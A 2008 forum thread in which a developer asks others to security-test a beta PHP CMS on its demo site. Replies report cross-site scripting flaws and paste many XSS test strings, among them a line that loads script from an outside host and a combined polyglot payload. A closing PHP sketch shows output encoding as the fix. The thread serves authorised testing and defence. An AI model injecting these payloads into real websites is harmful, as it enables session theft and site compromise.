Grayda Posted September 16, 2008

It's been out to the public for a while (as a beta), but I'm still doing security tests with it. Before I move my main website to this engine, can someone give it a thorough testing?

It's a dead-easy-to-use CMS. You install it, log in and your page reloads with some "Edit <page>" links next to each section of content. Click that link, type your new content into the WYSIWYG editor and click Save. The page reloads and your website is updated. Also uses phpGACL for security.

This is my first major PHP project released (despite using PHP for 3-4 years now) and I want to make sure it's good.

You can try out the live version at: http://demo.spage.solidinc.org and download the latest build (beta 2) from http://spage.solidinc.org/index.php?page=downloads&latest=1. Beta 2 comes with an installer so it should be rather easy to install.

I'd like you to fiddle with everything, see if unauthenticated users can get anywhere they're not supposed to, log in as moderators and try and escalate privileges, stuff like that. Obviously no stuff that will break the demo site (the demo site resets on the hour anyway).

And if you have time, some comments on what you think of its ease of use and stuff, but PM or email me with those because it's off-topic.

Coreye Posted September 17, 2008

Cross Site Scripting (XSS): http://demo.spage.solidinc.org/?page="><marquee><h1>Corey

Cross Site Scripting (XSS): You can submit ">code when adding page descriptions.

darkfreaks Posted October 13, 2008

XSS Injection:

DOM was modified by attack string. Field appears to be very vulnerable to XSS String.
Tested value: <xml id="X"><a><b><script>document.vulnerable=true;</script>;</b></a></xml>

DOM was modified by attack string. Field appears to be very vulnerable to XSS String.
Tested value: <<script>document.vulnerable=true;</script>

DOM was modified by attack string. Field appears to be very vulnerable to XSS String.
Tested value: <style><!--</style><script>document.vulnerable=true;//--></script>

DOM was modified by attack string. Field appears to be very vulnerable to XSS String.
Tested value: &<script>document.vulnerable=true;</script>

DOM was modified by attack string. Field appears to be very vulnerable to XSS String.
Tested value: <BODY ONLOAD=document.vulnerable=true;>

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <!-- -- --><script>document.vulnerable=true;</script><!-- -- -->

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <![CDATA[<!--]]<script>document.vulnerable=true;//--></script>

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <<script>document.vulnerable=true;</script>

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <style><!--</style><script>document.vulnerable=true;//--></script>

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.vulnerable=true></OBJECT>

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <!--[if gte IE 4]><SCRIPT>document.vulnerable=true;</SCRIPT><![endif]-->

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: ¼script¾document.vulnerable=true;¼/script¾

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <BODY ONLOAD=document.vulnerable=true;>

GKWelding Posted October 23, 2008

Your search box is vulnerable to XSS for sure. Just copy and paste the following into it and see for yourself.

<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

and typing in

';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

shows the same thing. The second example above is several attacks combined into one and is a good way of testing if you're in a rush...
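
The findings reported in this thread (the `?page=` value closing its attribute with `">`, markup accepted in page descriptions, and the search box) share one cause: request data written into the page without encoding for the context it lands in. The following PHP sketch is an added example, not SPage's code and not posted by anyone in the thread; the helper names `h`, `js` and `pageName`, the `home` default, the page-name format and the sample markup are assumptions, and the inputs are constructed from strings quoted above.

```php
<?php
declare(strict_types=1);

// Hypothetical helpers; SPage's real code is not shown in the thread.

/** Encode a value for HTML body text or a quoted attribute value. */
function h(string $value): string
{
    // ENT_QUOTES encodes both " and ', so `">` cannot close an attribute.
    // ENT_SUBSTITUTE replaces bytes that are invalid in UTF-8 instead of
    // making the whole result an empty string.
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Encode a value as a JavaScript string literal inside a <script> block. */
function js(string $value): string
{
    // The JSON_HEX_* flags emit <, >, &, ' and " as \uXXXX escapes, so neither
    // a quote nor `</SCRIPT>` can end the literal or the script element.
    $flags = JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT;
    return json_encode($value, $flags | JSON_THROW_ON_ERROR);
}

/** Accept only simple page names (assumed format); anything else maps to a default. */
function pageName(string $raw): string
{
    return preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $raw) === 1 ? $raw : 'home';
}

// Constructed inputs modelled on the strings posted in the thread.
$page   = '"><marquee><h1>Corey';
$search = '\';alert(String.fromCharCode(88,83,83))//--></SCRIPT>">\'>'
        . '<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>';

// Vulnerable pattern: raw concatenation lets the value leave its attribute.
$before = '<a href="?page=' . $page . '">Edit</a>';

// Hardened: allowlist the identifier, then encode for each output context.
$after = '<a href="?page=' . h(pageName($page)) . '">Edit</a>' . "\n"
       . '<p>Results for: ' . h($search) . '</p>' . "\n"
       . '<script>var term = ' . js($search) . ';</script>';

// Run from the command line to compare the two renderings as plain text.
echo "Before:\n", $before, "\n\nAfter:\n", $after, "\n";
```

Sending `Content-Type: text/html; charset=UTF-8` with every page keeps the browser from choosing an encoding itself, which is what byte-level strings such as the `¼script¾` test value depend on.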